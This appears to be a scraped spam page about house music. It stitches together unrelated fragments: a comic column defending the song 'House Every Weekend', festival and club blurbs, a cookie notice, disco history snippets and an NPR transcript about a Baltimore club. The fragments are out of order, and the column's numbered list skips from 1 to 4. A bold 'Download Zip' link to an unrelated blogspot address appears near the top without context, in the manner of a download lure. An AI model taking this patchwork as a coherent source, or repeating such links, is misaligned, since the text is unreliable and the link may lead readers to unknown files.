# House Music House Every Weekend
 
 
Defending the Indefensible is a semi-regular series which sees us trying to find merit in the abject, the terrible, and the deathly dull. We don't believe that there's such a thing as "guilty pleasure", so this series sets out to prove that even the most shocking and schlocky corners of dance music can find a home in somebody's heart.
 
Yeah, go on, laugh at me, pour as much scorn on me as you're able to muster. Parade me down the street on a carnival float made of Huaraches and depleted nos canisters into an afterparty. Passive-aggressively favourite my tweets and send my Facebook profile photos to your WhatsApp-banter-with-the-boys group. Yes, vilify and ruin me, all because I like listening to "House Every Weekend".
 
**Download Zip → [https://comlum-profhe.blogspot.com/?augy=2A0Tb9](https://comlum-profhe.blogspot.com/?augy=2A0Tb9)**


 
Why? Because, put simply, "House Every Weekend" fucking bangs. Seriously, it is absolutely massive. Sure, that bassline has been used in literally every single deep-tech-deep-house-interzone bubbler since dubstep swallowed so many wobbles that it's corpse washed sadly down the Thames, beaching itself in Tilbury where a few disinterested dockers prodded it with a dogshit-smeared stick and everyone started listening to house again. Yes, it sounds like it was knocked together in fifteen minute in FL Studio. True, the verses are pretty shonky. But so what? Who cares that it's incredibly derivative? Who cares that in a month's time the WKD-addled teens blasting it in every souped up Nova from Fazakerly to Frome will have spat it out like a spitty bit of Extra in favour of whatever fresh and flash stick of housey-Juicy Fruit's been passed their way? I don't. Because I like "House Every Weekend"
 
1) It sounds like being at the funfair. This might be because I heard it about fifteen times at the Lambeth Country Show this weekend and everytime that chorus bounced around the artisan burger vans and the bumper cars, it sounded next level. Seriously, this is the waltzer anthem our generation deserves. If you haven't puked up a hot dog or three to this after a whirl on a terrifyingly cranky ride with an airbrushed collage of Michael Jackson behind it then you've royally fucked the summer.
 
4) It's got a good hook. A great hook. A wonderful hook. You can sing along to it. You can hum along to it if you're the kind of person who doesn't like singing along to things. You can enjoy it internally and silently if you're a joyless husk of a man like me and the idea of humming, let alone singing, is about as appealing as taking stinging nettles to a festival in lieu of babywipes.
 
5) The lyrics are great. I think it is about a bloke who literally can't get out of the house. He's trapped, physically, metaphorically, within both himself and his house, so this song is his cry for help, a pleading, yearning, howl into the void, a desperate attempt to vacate the prison he's found himself dwelling in. It's a terrifying prospect. Imagine it. Imagine being stuck in your house every weekend. Every single Saturday and Sunday forevermore, stuck there, pacing from room to room, ambling into the bathroom for want of anything else to do, itemizing everything in the drawer of shit in the kitchen over and over again, fluffing pillows for hours on end, eating dust and washing it down with tears. Think of that next time you're raising a luridly coloured alcopop in the air at 2am to "House Every Weekend". Think of that.
 
Then there are the house music festivals like Arc Music Fest in August, West Fest in July, and the Chosen Few Festival and Picnic also in July. Each one embodies this community spirit, drawing thousands annually to celebrate house music. These gatherings are not just about music; they are about unity, expression, and the love for house music.
 
Chicago house music is now reaching global audiences more than ever before. Chicago house artists, DJs and producers travel the world playing at sold-out venues, festivals and clubs. This Chicago-created genre has also grabbed the attention of chart-topping artists like Drake, Beyonc and more, with Chicago house DJs and producers even receiving recognition for their work from the Grammys. Most recently, Chicago actor, comedian and house DJ, Deon Cole, performed a house music set with fellow DJ D-Nice at the 2024 Essence Fest.

Heaven Can Wait features the best house music in New York City, with an upbeat feel using groove elements to get things steamy. Our rotating roster of top DJs bring the best of the house music to Alphabet City, with touches of pop, funk, jazz, latin music and much more! Get pumping with hard hitting house music every weekend at Heaven Can Wait.
 
Defected would like to use cookies to store information on your computer to improve our website and to enable us to advertise to you those products and services which we believe may be of interest to you. One of the cookies we use is essential for parts of the site to work and has already been sent. You may delete and block all cookies from this site but some elements may not work correctly. To find out more about online behavioural advertising or about the cookies we use and how to delete them, please refer to our privacy policy. By closing, you're agreeing to cookies being used in line with our Cookie Policy.
 
At the same time, underground disco pioneers such as Larry Levan, Tom Moulton and Walter Gibbons were boldly wrestling new mixing and editing techniques in the studio, stretching the existing arrangements of disco records to the limits of funky elasticity. It was an approach quickly embraced by early house titans Ron Hardy and Frankie Knuckles. They would create similarly extended compositions using synths, sequencers and samplers and then hammer them at their soon-to-be-iconic club nights in Chicago. House had been born.
 
And more exciting, monumental births were on their way. As Skream put it, rather beautifully, two years ago: They don't realise that, if it wasn't for that [disco] era, there would be no house, no hardcore, no jungle or drum'n'bass, and no UK garage or dubstep." Disco is well and truly the daddy....
 
Disco provides perfect counterbalance to the absorbing if rather serious, heads-down propulsion of major dance genres like deep house and techno. Any dancefloor should offer a journey, yes, but sometimes you simply want glittering sunshine vistas rather than moody, introspective submersion. Both have their place but disco is, well more smiley....
 
Rodgers hung with Hendrix, founded Chic...and in turn took disco credibly mainstream, became an addict himself, pursued boundary-breaking avenues with pop heavyweights like David Bowie and Madonna, nearly crashed and burned in hospital after another raucous night of partying, reformed Chic, shimmied with Daft Punk and, in doing so, returned disco to its former pop-culture pedestal. Phew!
 
Disco has far more up its flared trousers than big, sparkly glitterballs and a bunch of hip-swingingly good grooves. Its history aligns closely with the pivotal, late 20th century struggle against social and racial oppression in America, the unity of its sound a rallying cry for the ethnic and LGBT minorities who predominantly supported it. Disco played a pivotal role in extending the rights (and position) of gay people in America, not to mention black and ethnic communities, and women. The music, and the clubs it was played in, presented welcome refuge for the troubled and persecuted, in turn convincing all within earshot that happier, more tolerant times lay ahead.
 
(Soundbite of music) MICHEL MARTIN, host: On the second Saturday of every month, you can hear - but more importantly, dance to - up tempo soul and funk infused music better known as deep house. For the uninitiated, like me, you can identify the house genre by the prominent kick drum that helps you feel every beat in the music. A diverse group of house music fans convenes at the Paradox Club in Baltimore to dance, or as they call it, jack their body. Tucked away under railroad tracks, the Paradox hosts legendary underground house music DJs who spin for a crowd that mostly grew in the mid-80's when house music first became popular. Most dancers or jackers begin arriving around 2 a.m. and they jack until sunrise. Producers Sami Yenigun and Monika Evstatieva visited the club one hot summer night. (Soundbite of music) VANESSA: My name is Vanessa and I've been clubbing to house music since I was 16 years old. I'm 43. Thank you very much. And I just love the music. It's just my inspiration. It just lifts my spirit and I work hard. So when I come out and relax this is what I do. (Soundbite of music) VANESSA: I like this music because it brings diversity. You know, we're about, everybody just coming together like a melting pot and just embracing each other and just loving each other. And then we have so many people that's here, been clubbing here for years. (Soundbite of music) Unidentified Woman: (Singing) Close your eyes and let your head roll(ph) down. Your feet up off the ground. Mr. CHRIS BURNS (DJ and club promoter): My name is Chris Burns. I'm a DJ, producer and promoter from Washington, D.C., and I deal in the business of house music. Every DJ has a different mission, is going to have a different responsibility. But my personal goal is to inflect my appreciation and respect for the history and sound of older house music into newer technology, into newer production techniques, so that it's a fusion of both. And I think that this going to come around with a lot of other producers, as youve seen the resurgence of popular you know, Robin S "Show me Love." (Soundbite of song, "Show me Love") ROBIN S (Singer): (Singing) You've got to show me love. Heartbreak and promises. Mr. BURNS: Ce Ce Penitston, "Finally" and all the other, you know, popular tracks of the early 90's of, you know, of that era. (Soundbite of song, "Show me Love") ROBIN S: (Singing) Im tired of giving my love and getting nowhere, nowhere. Mr. BURNS: The Paradox is a real throwback club that was built I think in 1990 and it's pretty much stayed unchanged except with a few architectural modifications. It has the same original analog sound system, the same as you would find in clubs built in that era. And with technology changing to a more digital format, with deejaying and sound technology, sounds systems aren't built like that anymore. And to be honest, I think this Paradox is very special because it has the best sound system on the East Coast that I've heard of. (Soundbite of song, "Show me Love") ROBIN S (Singer): (Singing) So, baby if you want me. Youve got to show me love. Mr. BURNS: A lot of different people go the Deep Sugar parties at the Paradox. The Deep Sugar really has preserved the house music culture in Baltimore that is really rich and still has a great influence on dance music today. The demographic predominately is an older, middle-aged black crowd that, you know, has continued to dance and has continued to support house music, especially in Baltimore. (Soundbite of music) Ms. SONIA HELLYER: My name is Sonia Hellyer. I've been coming for how many years? Been at least probably 14 years, Ill say. And I just love house music. House music is something I relax to. I dance. It's a form of release, a form of exercise for me and I enjoy the atmosphere, as well. I have a daughter who is nine and we clean the house to house music. And it's funny because she'll say mom, could we listen to your music? The music moves you. And it just makes you dance. It makes you go. It picks you up. You know, if youre having a bad day, you listen to it because it's also infused with gospel music too. And I can go to church so that like, I'll be out of this world listening to gospel music house. So its just uplifting and (unintelligible). (Soundbite of music) MARTIN: Now, our sources tell us that the next Deep Sugar party will be hosted this Saturday night in Baltimore. If you want to find out more about deep house, just go to the program page at npr.org and select TELL ME MORE. (Soundbite of music) MARTIN: And that's our program for today. Im Michel Martin and this is TELL ME MORE from NPR News. Lets talk more tomorrow. (Soundbite of music)
 a2f82b0cb4
 
